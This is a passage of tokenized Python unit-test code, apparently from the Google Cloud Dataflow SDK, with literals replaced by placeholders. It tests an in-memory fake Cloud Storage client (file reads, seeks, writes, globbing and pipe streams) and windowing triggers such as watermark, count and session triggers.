+ <NUM_LIT:1> ] ) <EOL> download . GetRange = get_range_callback <EOL> def Insert ( self , insert_request , upload = None ) : <EOL> assert upload is not None <EOL> generation = <NUM_LIT:1> <EOL> f = self . get_file ( insert_request . bucket , insert_request . name ) <EOL> if f is not None : <EOL> generation = f . generation + <NUM_LIT:1> <EOL> f = FakeFile ( insert_request . bucket , insert_request . name , '<STR_LIT>' , generation ) <EOL> stream = upload . stream <EOL> data_list = [ ] <EOL> while True : <EOL> data = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> if not data : <EOL> break <EOL> data_list . append ( data ) <EOL> f . contents = '<STR_LIT>' . join ( data_list ) <EOL> self . add_file ( f ) <EOL> def List ( self , list_request ) : <EOL> bucket = list_request . bucket <EOL> prefix = list_request . prefix or '<STR_LIT>' <EOL> matching_files = [ ] <EOL> for file_bucket , file_name in sorted ( iter ( self . files ) ) : <EOL> if bucket == file_bucket and file_name . startswith ( prefix ) : <EOL> file_object = self . files [ ( file_bucket , file_name ) ] . get_metadata ( ) <EOL> matching_files . append ( file_object ) <EOL> items_per_page = <NUM_LIT:5> <EOL> if not list_request . pageToken : <EOL> range_start = <NUM_LIT:0> <EOL> else : <EOL> if list_request . pageToken not in self . list_page_tokens : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> range_start = self . list_page_tokens [ list_request . pageToken ] <EOL> del self . list_page_tokens [ list_request . pageToken ] <EOL> result = storage . Objects ( <EOL> items = matching_files [ range_start : range_start + items_per_page ] ) <EOL> if range_start + items_per_page < len ( matching_files ) : <EOL> next_range_start = range_start + items_per_page <EOL> next_page_token = '<STR_LIT>' % ( bucket , prefix , <EOL> next_range_start ) <EOL> self . list_page_tokens [ next_page_token ] = next_range_start <EOL> result . nextPageToken = next_page_token <EOL> return result <EOL> class TestGCSPathParser ( unittest . TestCase ) : <EOL> def test_gcs_path ( self ) : <EOL> self . assertEqual ( <EOL> gcsio . parse_gcs_path ( '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( <EOL> gcsio . parse_gcs_path ( '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_bad_gcs_path ( self ) : <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> class TestGCSIO ( unittest . TestCase ) : <EOL> def _insert_random_file ( self , client , path , size , generation = <NUM_LIT:1> ) : <EOL> bucket , name = gcsio . parse_gcs_path ( path ) <EOL> f = FakeFile ( bucket , name , os . urandom ( size ) , generation ) <EOL> client . objects . add_file ( f ) <EOL> return f <EOL> def setUp ( self ) : <EOL> self . client = FakeGcsClient ( ) <EOL> self . gcs = gcsio . GcsIO ( self . client ) <EOL> def test_full_file_read ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:100> <EOL> random_file = self . _insert_random_file ( self . client , file_name , file_size ) <EOL> f = self . gcs . open ( file_name ) <EOL> f . seek ( <NUM_LIT:0> , os . SEEK_END ) <EOL> self . assertEqual ( f . tell ( ) , file_size ) <EOL> self . assertEqual ( f . read ( ) , '<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> self . assertEqual ( f . read ( ) , random_file . contents ) <EOL> def test_file_random_seek ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> - <NUM_LIT:100> <EOL> random_file = self . _insert_random_file ( self . client , file_name , file_size ) <EOL> f = self . gcs . open ( file_name ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> for _ in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> a = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> b = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> start , end = min ( a , b ) , max ( a , b ) <EOL> f . seek ( start ) <EOL> self . assertEqual ( f . tell ( ) , start ) <EOL> self . assertEqual ( f . read ( end - start + <NUM_LIT:1> ) , <EOL> random_file . contents [ start : end + <NUM_LIT:1> ] ) <EOL> self . assertEqual ( f . tell ( ) , end + <NUM_LIT:1> ) <EOL> def test_file_read_line ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> lines = [ ] <EOL> read_buffer_size = <NUM_LIT> <EOL> lines . append ( '<STR_LIT:x>' * <NUM_LIT> + '<STR_LIT:\n>' ) <EOL> for _ in range ( <NUM_LIT:1> , <NUM_LIT:1000> ) : <EOL> line_length = random . randint ( <NUM_LIT:100> , <NUM_LIT> ) <EOL> line = os . urandom ( line_length ) . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) + '<STR_LIT:\n>' <EOL> lines . append ( line ) <EOL> contents = '<STR_LIT>' . join ( lines ) <EOL> file_size = len ( contents ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . client . objects . add_file ( FakeFile ( bucket , name , contents , <NUM_LIT:1> ) ) <EOL> f = self . gcs . open ( file_name , read_buffer_size = read_buffer_size ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> self . assertEqual ( f . readline ( ) , lines [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( f . tell ( ) , len ( lines [ <NUM_LIT:0> ] ) ) <EOL> self . assertEqual ( f . readline ( ) , lines [ <NUM_LIT:1> ] ) <EOL> f . seek ( file_size - len ( lines [ - <NUM_LIT:1> ] ) - <NUM_LIT:1> ) <EOL> self . assertEqual ( f . readline ( ) , '<STR_LIT:\n>' ) <EOL> f . seek ( file_size ) <EOL> self . assertEqual ( f . readline ( ) , '<STR_LIT>' ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> for _ in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> start = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> line_index = <NUM_LIT:0> <EOL> chars_left = start <EOL> while True : <EOL> next_line_length = len ( lines [ line_index ] ) <EOL> if chars_left - next_line_length < <NUM_LIT:0> : <EOL> break <EOL> chars_left -= next_line_length <EOL> line_index += <NUM_LIT:1> <EOL> f . seek ( start ) <EOL> self . assertEqual ( f . readline ( ) , lines [ line_index ] [ chars_left : ] ) <EOL> def test_file_write ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> <EOL> contents = os . urandom ( file_size ) <EOL> f = self . gcs . open ( file_name , '<STR_LIT:w>' ) <EOL> f . write ( contents [ <NUM_LIT:0> : <NUM_LIT:1000> ] ) <EOL> f . write ( contents [ <NUM_LIT:1000> : <NUM_LIT> * <NUM_LIT> ] ) <EOL> f . write ( contents [ <NUM_LIT> * <NUM_LIT> : ] ) <EOL> f . close ( ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . assertEqual ( <EOL> self . client . objects . get_file ( bucket , name ) . contents , contents ) <EOL> def test_context_manager ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT> <EOL> contents = os . urandom ( file_size ) <EOL> with self . gcs . open ( file_name , '<STR_LIT:w>' ) as f : <EOL> f . write ( contents ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . assertEqual ( <EOL> self . client . objects . get_file ( bucket , name ) . contents , contents ) <EOL> with self . gcs . open ( file_name ) as f : <EOL> self . assertEqual ( f . read ( ) , contents ) <EOL> with self . assertRaises ( ZeroDivisionError ) : <EOL> with self . gcs . open ( file_name ) as f : <EOL> f . read ( <NUM_LIT:0> / <NUM_LIT:0> ) <EOL> def test_glob ( self ) : <EOL> bucket_name = '<STR_LIT>' <EOL> object_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for object_name in object_names : <EOL> file_name = '<STR_LIT>' % ( bucket_name , object_name ) <EOL> self . _insert_random_file ( self . client , file_name , <NUM_LIT:0> ) <EOL> test_cases = [ <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ] <EOL> for file_pattern , expected_object_names in test_cases : <EOL> expected_file_names = [ '<STR_LIT>' % ( bucket_name , o ) for o in <EOL> expected_object_names ] <EOL> self . assertEqual ( set ( self . gcs . glob ( file_pattern ) ) , <EOL> set ( expected_file_names ) ) <EOL> class TestPipeStream ( unittest . TestCase ) : <EOL> def _read_and_verify ( self , stream , expected , buffer_size ) : <EOL> data_list = [ ] <EOL> bytes_read = <NUM_LIT:0> <EOL> seen_last_block = False <EOL> while True : <EOL> data = stream . read ( buffer_size ) <EOL> self . assertLessEqual ( len ( data ) , buffer_size ) <EOL> if len ( data ) < buffer_size : <EOL> if data : <EOL> self . assertFalse ( seen_last_block ) <EOL> seen_last_block = True <EOL> if not data : <EOL> break <EOL> data_list . append ( data ) <EOL> bytes_read += len ( data ) <EOL> self . assertEqual ( stream . tell ( ) , bytes_read ) <EOL> self . assertEqual ( '<STR_LIT>' . join ( data_list ) , expected ) <EOL> def test_pipe_stream ( self ) : <EOL> block_sizes = list ( <NUM_LIT:4> ** i for i in range ( <NUM_LIT:0> , <NUM_LIT:12> ) ) <EOL> data_blocks = list ( os . urandom ( size ) for size in block_sizes ) <EOL> expected = '<STR_LIT>' . join ( data_blocks ) <EOL> buffer_sizes = [ <NUM_LIT> , <NUM_LIT> * <NUM_LIT> , <NUM_LIT> * <NUM_LIT> ] <EOL> for buffer_size in buffer_sizes : <EOL> parent_conn , child_conn = multiprocessing . Pipe ( ) <EOL> stream = gcsio . GcsBufferedWriter . PipeStream ( child_conn ) <EOL> child_thread = threading . Thread ( target = self . _read_and_verify , <EOL> args = ( stream , expected , buffer_size ) ) <EOL> child_thread . start ( ) <EOL> for data in data_blocks : <EOL> parent_conn . send_bytes ( data ) <EOL> parent_conn . close ( ) <EOL> child_thread . join ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import os . path <EOL> import unittest <EOL> import yaml <EOL> import google . cloud . dataflow as df <EOL> from google . cloud . dataflow . pipeline import Pipeline <EOL> from google . cloud . dataflow . transforms . core import Windowing <EOL> from google . cloud . dataflow . transforms . trigger import AccumulationMode <EOL> from google . cloud . dataflow . transforms . trigger import AfterAll <EOL> from google . cloud . dataflow . transforms . trigger import AfterCount <EOL> from google . cloud . dataflow . transforms . trigger import AfterEach <EOL> from google . cloud . dataflow . transforms . trigger import AfterFirst <EOL> from google . cloud . dataflow . transforms . trigger import AfterWatermark <EOL> from google . cloud . dataflow . transforms . trigger import DefaultTrigger <EOL> from google . cloud . dataflow . transforms . trigger import GeneralTriggerDriver <EOL> from google . cloud . dataflow . transforms . trigger import InMemoryUnmergedState <EOL> from google . cloud . dataflow . transforms . trigger import Repeatedly <EOL> from google . cloud . dataflow . transforms . util import assert_that , equal_to <EOL> from google . cloud . dataflow . transforms . window import FixedWindows <EOL> from google . cloud . dataflow . transforms . window import IntervalWindow <EOL> from google . cloud . dataflow . transforms . window import MIN_TIMESTAMP <EOL> from google . cloud . dataflow . transforms . window import OutputTimeFn <EOL> from google . cloud . dataflow . transforms . window import Sessions <EOL> from google . cloud . dataflow . transforms . window import TimestampedValue <EOL> from google . cloud . dataflow . transforms . window import WindowedValue <EOL> from google . cloud . dataflow . transforms . window import WindowFn <EOL> class CustomTimestampingFixedWindowsWindowFn ( FixedWindows ) : <EOL> """<STR_LIT>""" <EOL> def get_transformed_output_time ( self , unused_window , input_timestamp ) : <EOL> return input_timestamp + <NUM_LIT:100> <EOL> class TriggerTest ( unittest . TestCase ) : <EOL> def run_trigger_simple ( self , window_fn , trigger_fn , accumulation_mode , <EOL> timestamped_data , expected_panes , * groupings , <EOL> ** kwargs ) : <EOL> late_data = kwargs . pop ( '<STR_LIT>' , [ ] ) <EOL> assert not kwargs <EOL> def bundle_data ( data , size ) : <EOL> bundle = [ ] <EOL> for timestamp , elem in data : <EOL> windows = window_fn . assign ( WindowFn . AssignContext ( timestamp , elem ) ) <EOL> bundle . append ( WindowedValue ( elem , timestamp , windows ) ) <EOL> if len ( bundle ) == size : <EOL> yield bundle <EOL> bundle = [ ] <EOL> if bundle : <EOL> yield bundle <EOL> if not groupings : <EOL> groupings = [ <NUM_LIT:1> ] <EOL> for group_by in groupings : <EOL> bundles = [ ] <EOL> bundle = [ ] <EOL> for timestamp , elem in timestamped_data : <EOL> windows = window_fn . assign ( WindowFn . AssignContext ( timestamp , elem ) ) <EOL> bundle . append ( WindowedValue ( elem , timestamp , windows ) ) <EOL> if len ( bundle ) == group_by : <EOL> bundles . append ( bundle ) <EOL> bundle = [ ] <EOL> bundles . append ( bundle ) <EOL> self . run_trigger ( window_fn , trigger_fn , accumulation_mode , <EOL> bundle_data ( timestamped_data , group_by ) , <EOL> bundle_data ( late_data , group_by ) , <EOL> expected_panes ) <EOL> def run_trigger ( self , window_fn , trigger_fn , accumulation_mode , <EOL> bundles , late_bundles , <EOL> expected_panes ) : <EOL> actual_panes = collections . defaultdict ( list ) <EOL> driver = GeneralTriggerDriver ( <EOL> Windowing ( window_fn , trigger_fn , accumulation_mode ) ) <EOL> state = InMemoryUnmergedState ( ) <EOL> for bundle in bundles : <EOL> for wvalue in driver . process_elements ( state , bundle , MIN_TIMESTAMP ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> while state . timers : <EOL> for timer_window , ( name , time_domain , timestamp ) in ( <EOL> state . get_and_clear_timers ( ) ) : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , timestamp , state ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> for bundle in late_bundles : <EOL> for wvalue in driver . process_elements ( state , bundle , MIN_TIMESTAMP ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> while state . timers : <EOL> for timer_window , ( name , time_domain , timestamp ) in ( <EOL> state . get_and_clear_timers ( ) ) : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , timestamp , state ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> self . assertEqual ( expected_panes , actual_panes ) <EOL> def test_fixed_watermark ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:10> , <NUM_LIT:20> ) : [ set ( '<STR_LIT:c>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> ) <EOL> def test_fixed_watermark_with_early ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) , set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:3> ) <EOL> def test_fixed_watermark_with_early_late ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:100> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:3> ) , <EOL> late = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . DISCARDING , <EOL> zip ( range ( <NUM_LIT:9> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:100> ) : [ <EOL> set ( '<STR_LIT>' ) , set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT:i>' ) , <EOL> set ( '<STR_LIT>' ) , set ( '<STR_LIT>' ) <EOL> ] } , <EOL> <NUM_LIT:2> , <EOL> late_data = zip ( range ( <NUM_LIT:5> ) , '<STR_LIT>' ) ) <EOL> def test_sessions_watermark_with_early_late ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) , <EOL> late = AfterCount ( <NUM_LIT:1> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:7> , '<STR_LIT:c>' ) , ( <NUM_LIT:30> , '<STR_LIT:d>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT>' ) <EOL> ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT:d>' ) , <EOL> ] , <EOL> IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT>' ) <EOL> ] , <EOL> } , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT> , '<STR_LIT:z>' ) ] ) <EOL> def test_fixed_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:11> , '<STR_LIT:z>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:11> , '<STR_LIT:z>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> ) <EOL> def test_fixed_after_first ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterFirst ( AfterCount ( <NUM_LIT:2> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterFirst ( AfterCount ( <NUM_LIT:5> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT:3> , '<STR_LIT:z>' ) ] ) <EOL> def test_repeatedly_after_first ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:100> ) , <EOL> Repeatedly ( AfterFirst ( AfterCount ( <NUM_LIT:3> ) , AfterWatermark ( ) ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:7> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:100> ) : [ <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> late_data = zip ( range ( <NUM_LIT:3> ) , '<STR_LIT>' ) ) <EOL> def test_sessions_after_all ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterAll ( AfterCount ( <NUM_LIT:2> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterAll ( AfterCount ( <NUM_LIT:5> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT:3> , '<STR_LIT:z>' ) ] ) <EOL> def test_sessions_default ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> DefaultTrigger ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT:12> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:15> , '<STR_LIT:c>' ) , ( <NUM_LIT:16> , '<STR_LIT:d>' ) , ( <NUM_LIT:30> , '<STR_LIT:z>' ) , ( <NUM_LIT:9> , '<STR_LIT:e>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT:f>' ) , ( <NUM_LIT:30> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:6> ) <EOL> def test_sessions_watermark ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT:12> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:15> , '<STR_LIT:c>' ) , ( <NUM_LIT:16> , '<STR_LIT:d>' ) , ( <NUM_LIT:30> , '<STR_LIT:z>' ) , ( <NUM_LIT:9> , '<STR_LIT:e>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT:f>' ) , ( <NUM_LIT:30> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:6> ) <EOL> def test_sessions_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:30> , '<STR_LIT:s>' ) , ( <NUM_LIT> , '<STR_LIT:t>' ) , ( <NUM_LIT:50> , '<STR_LIT:z>' ) , <EOL> ( <NUM_LIT:50> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) ] , <EOL> 